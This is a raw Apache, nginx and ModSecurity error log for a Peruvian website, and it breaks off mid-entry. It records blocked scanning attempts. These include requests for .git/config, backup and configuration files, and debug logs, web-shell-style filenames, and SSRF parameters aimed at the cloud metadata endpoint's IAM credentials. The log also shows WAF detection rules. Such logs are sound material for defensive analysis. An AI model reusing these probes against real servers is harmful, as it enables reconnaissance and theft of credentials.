[autoindex:error] [pid 1214:tid 140405576238848] [client 194.5.82.62:44578] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Fri Feb 28 16:19:13.184570 2025] [autoindex:error] [pid 1281:tid 140405525882624] [client 194.5.82.62:44600] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Fri Feb 28 16:19:17.389420 2025] [autoindex:error] [pid 21704:tid 140405668558592] [client 194.5.82.62:44620] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Fri Feb 28 16:19:22.577301 2025] [autoindex:error] [pid 21426:tid 140405559453440] [client 194.5.82.62:44638] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Fri Feb 28 16:19:23.724320 2025] [autoindex:error] [pid 21704:tid 140405567846144] [client 194.5.82.62:44644] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Fri Feb 28 16:19:26.383142 2025] [:error] [pid 21704:tid 140405651773184] [client 194.5.82.62:44656] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Feb 28 16:19:59.398116 2025] [autoindex:error] [pid 21424:tid 140405702129408] [client 194.5.82.62:44768] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/customize/index.php [Fri Feb 28 16:20:06.707105 2025] [autoindex:error] [pid 21704:tid 140405685344000] [client 194.5.82.62:44792] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Fri Feb 28 16:20:20.681221 2025] [autoindex:error] [pid 21424:tid 140405643380480] [client 194.5.82.62:44836] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Feb 28 16:20:31.521585 2025] [autoindex:error] [pid 21425:tid 140405693736704] [client 194.5.82.62:44880] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Fri Feb 28 16:20:47.632417 2025] [:error] [pid 21426:tid 140405651773184] [client 194.5.82.62:44932] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Feb 28 16:20:48.970016 2025] [autoindex:error] [pid 21426:tid 140405777860352] [client 194.5.82.62:44938] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Fri Feb 28 16:21:09.376455 2025] [:error] [pid 21704:tid 140405626595072] [client 194.5.82.62:45012] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri Feb 28 16:21:28.894408 2025] [:error] [pid 21704:tid 140405534275328] [client 194.5.82.62:45078] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Fri Feb 28 16:21:45.534214 2025] [autoindex:error] [pid 21704:tid 140405634987776] [client 194.5.82.62:45140] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Fri Feb 28 16:22:30.763187 2025] [:error] [pid 1214:tid 140405668558592] [client 194.5.82.62:45290] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php 2025/02/28 17:01:52 [error] 21522#21522: *70183 access forbidden by rule, client: 45.148.10.80, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/02/28 18:46:05 [error] 21523#21523: *71633 access forbidden by rule, client: 45.148.10.80, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/02/28 19:51:58 [error] 21522#21522: *72111 access forbidden by rule, client: 45.148.10.80, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/02/28 20:54:15 [error] 21522#21522: *72700 access forbidden by rule, client: 45.148.10.80, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sat Mar 01 01:05:31.210795 2025] [:error] [pid 21425:tid 140405525882624] [client 193.41.206.176:55958] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Z8Kjq6piN1cGLwdu-r3NiAAAAFc"] [Sat Mar 01 01:05:32.556220 2025] [:error] [pid 1214:tid 140405693736704] [client 193.41.206.176:55966] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Z8KjrFuJlAwwBgM-_SSl9wAAAQM"] [Sat Mar 01 03:16:22.840210 2025] [ssl:warn] [pid 13211:tid 140487991437184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 01 03:16:23.439299 2025] [ssl:warn] [pid 13214:tid 140487991437184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 01 03:16:24.762963 2025] [ssl:warn] [pid 13214:tid 140487991437184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 01 03:16:36.990455 2025] [ssl:warn] [pid 13214:tid 140487991437184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 01 03:16:39.315705 2025] [ssl:warn] [pid 13660:tid 140387744540544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 01 03:16:39.510250 2025] [ssl:warn] [pid 13661:tid 140387744540544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2025/03/01 04:12:26 [error] 13967#13967: *76829 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/01 04:32:07 [error] 13967#13967: *76930 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sat Mar 01 04:36:42.465001 2025] [autoindex:error] [pid 14011:tid 140387553400576] [client 64.227.143.222:59244] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2025/03/01 04:49:46 [error] 13967#13967: *77061 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/01 04:52:36 [error] 13967#13967: *77080 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/01 05:17:06 [error] 13967#13967: *77302 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/01 05:41:34 [error] 13968#13968: *77653 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sat Mar 01 21:39:49.472771 2025] [autoindex:error] [pid 13677:tid 140387431732992] [client 194.163.129.207:47792] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com [Sat Mar 01 21:39:56.806344 2025] [autoindex:error] [pid 13677:tid 140387448518400] [client 194.163.129.207:47808] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com [Sat Mar 01 21:39:58.151452 2025] [autoindex:error] [pid 13676:tid 140387305842432] [client 194.163.129.207:47812] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com [Sat Mar 01 21:40:00.048659 2025] [autoindex:error] [pid 14011:tid 140387297449728] [client 194.163.129.207:47816] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.google.com [Sun Mar 02 03:29:43.867795 2025] [ssl:warn] [pid 32755:tid 140340125091712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 02 03:29:44.326629 2025] [ssl:warn] [pid 32756:tid 140340125091712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 02 03:29:45.011084 2025] [ssl:warn] [pid 32756:tid 140340125091712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 02 03:29:51.005822 2025] [ssl:warn] [pid 32756:tid 140340125091712] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 02 03:29:54.783058 2025] [ssl:warn] [pid 814:tid 139968591005568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 02 03:29:54.967646 2025] [ssl:warn] [pid 815:tid 139968591005568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 02 08:11:55.676248 2025] [authz_core:error] [pid 941:tid 139968269768448] [client 206.189.19.19:57366] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/02 08:12:00 [error] 792#792: *94226 access forbidden by rule, client: 206.189.19.19, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Mar 02 12:07:46.528980 2025] [autoindex:error] [pid 941:tid 139968135485184] [client 64.227.143.222:36778] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Mar 02 14:13:01.118250 2025] [authz_core:error] [pid 941:tid 139968252983040] [client 146.190.242.161:38272] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/02 14:13:05 [error] 792#792: *99344 access forbidden by rule, client: 146.190.242.161, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Mar 02 16:29:59.779003 2025] [:error] [pid 818:tid 139968236197632] [client 193.41.206.138:39842] [client 193.41.206.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z8TN18zniw3Z-36KVaZ3XQAAAIw"] [Sun Mar 02 16:29:59.854041 2025] [:error] [pid 816:tid 139968169056000] [client 193.41.206.138:39844] [client 193.41.206.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-default-ssm/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z8TN12hz1kWeFcXOEMZjlAAAABQ"] [Sun Mar 02 16:29:59.929056 2025] [:error] [pid 816:tid 139968219412224] [client 193.41.206.138:39846] [client 193.41.206.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-opsworks-ec2-role"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z8TN12hz1kWeFcXOEMZjlQAAAA4"] 2025/03/02 23:40:00 [error] 792#792: *103090 access forbidden by rule, client: 45.148.10.249, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Mar 03 02:46:47.878318 2025] [:error] [pid 818:tid 139968278161152] [client 170.39.218.109:47390] [client 170.39.218.109] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/httpd.conf"] [unique_id "Z8VeZ8zniw3Z-36KVaZ4hgAAAIc"] [Mon Mar 03 02:47:12.036746 2025] [:error] [pid 817:tid 139968374687488] [client 170.39.218.109:47468] [client 170.39.218.109] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/config/php.ini"] [unique_id "Z8VegOlCTfbhQYYxP7oiJAAAAEQ"] 2025/03/03 02:47:33 [error] 793#793: *104667 access forbidden by rule, client: 170.39.218.109, server: investigacionperu.com, request: "GET /.htaccess HTTP/1.1", host: "investigacionperu.com" [Mon Mar 03 03:13:38.993573 2025] [ssl:warn] [pid 11069:tid 140527466047360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 03 03:13:39.262837 2025] [ssl:warn] [pid 11070:tid 140527466047360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 03 03:13:39.854038 2025] [ssl:warn] [pid 11070:tid 140527466047360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 03 03:13:46.081775 2025] [ssl:warn] [pid 11070:tid 140527466047360] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 03 03:13:48.410086 2025] [ssl:warn] [pid 11507:tid 140610179725184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 03 03:13:48.687618 2025] [ssl:warn] [pid 11508:tid 140610179725184] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 03 09:49:59.989334 2025] [:error] [pid 11525:tid 140609847260928] [client 185.220.101.9:54294] [client 185.220.101.9] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/installer-data.sql"] [unique_id "Z8XBl65XbL5ckXPy1aO70QAAAIk"] 2025/03/03 09:58:15 [error] 11487#11487: *108902 access forbidden by rule, client: 45.148.10.249, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Mar 03 22:34:22.237243 2025] [:error] [pid 11934:tid 140609897617152] [client 172.93.102.106:36492] [client 172.93.102.106] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-content/debug.log"] [unique_id "Z8Z0vrC03nVaZwgOEseC9AAAAMM"] 2025/03/04 00:10:00 [error] 11488#11488: *116464 access forbidden by rule, client: 45.148.10.80, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Tue Mar 04 03:17:14.866609 2025] [ssl:warn] [pid 5706:tid 140471362320256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 04 03:17:15.340919 2025] [ssl:warn] [pid 5708:tid 140471362320256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 04 03:17:16.417995 2025] [ssl:warn] [pid 5708:tid 140471362320256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 04 03:17:20.859836 2025] [ssl:warn] [pid 5708:tid 140471362320256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 04 03:17:23.317253 2025] [ssl:warn] [pid 6140:tid 139802289452928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 04 03:17:23.562948 2025] [ssl:warn] [pid 6141:tid 139802289452928] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2025/03/04 06:34:49 [error] 6434#6434: *125605 access forbidden by rule, client: 45.148.10.80, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/04 09:10:20 [error] 6433#6433: *127395 access forbidden by rule, client: 45.148.10.80, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Tue Mar 04 12:27:21.106869 2025] [authz_core:error] [pid 6157:tid 139802089920256] [client 165.227.84.14:58302] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/04 12:27:25 [error] 6434#6434: *130344 access forbidden by rule, client: 165.227.84.14, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Mar 04 16:04:44.039180 2025] [autoindex:error] [pid 32663:tid 139801923647232] [client 64.227.143.222:36734] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Mar 04 16:31:15.234324 2025] [authz_core:error] [pid 6718:tid 139801932039936] [client 207.154.197.113:37340] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/04 16:31:20 [error] 6433#6433: *134225 access forbidden by rule, client: 207.154.197.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/04 16:42:44 [error] 6433#6433: *134268 access forbidden by 